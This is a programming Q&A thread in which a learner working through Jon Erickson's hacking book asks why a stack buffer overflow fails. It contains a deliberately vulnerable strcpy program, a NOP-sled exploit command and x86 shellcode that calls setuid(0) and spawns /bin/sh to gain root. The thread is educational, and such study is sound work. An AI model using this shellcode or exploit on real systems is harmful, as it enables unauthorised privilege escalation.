# Trying to do stack overflow with perl

Tags: perl, fault, shellcode

I am trying to do stack overflow using perl (of course get root privileges using normal user (using shellcode)). I am learning hacking with Jon Erickson's book and I would be really glad if you would help me a bit.
I am typing this command:

```
./vuln `perl -e 'print "\x90"x202'``cat shellcode``perl -e 'print "\x70\xcc\x81\xbe"x70;'`
```

`vuln`:

```
int main(int argc, char *argv[])
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}
```

`shellcode`:

```
\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
```

and I get "Segmentation fault". I know that I need to fill every ret adress but no matter what I do, when I am trying to paste more than 67 ESP (stack pointers) I get this error.

Comment: Just    perl -e 'print \x70\xcc\x81\xbe" ?    I get : ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�ṕ�

Comment: yea I know what you mean, I corrected that, it was mistake in the code I pasted to the question, when I executed it in terminal it was written correctly.

Comment: You still haven't specified what problem you are having. Is it a problem getting the "shellcode" to execute? If not, is it a problem with the "shellcode" itself? If so, where it is failing? If no, are you saying it's a problem getting the last part to run?

Comment: Sorry about that mistake, I havent really noticed it before, i will be more careful next time. Yes, it's problem with executing shellcode. Everything with just overflowing buffer it's understandable for me and everything is working. Problem occurs when I am trying to run shellcode with suid exe to get root privileges. Reading what the book says I need to fill every ret adress, and when I get "Segmentation fault" error it is connected to not filling every ret adress. How can I know how many ret adress should I paste? Of course if it is the solution.

Comment: so, someone is maybe some buffer overflow specialist and can tell me what is wrong with the code or shellcode?

Answer (score 0):

Try running the program under gdb and see where it crashes. One thing in particular to be careful of when combining `cat file` in your exploit is that it may append a new line `\n` byte and cause your shellcode to get out of alignment.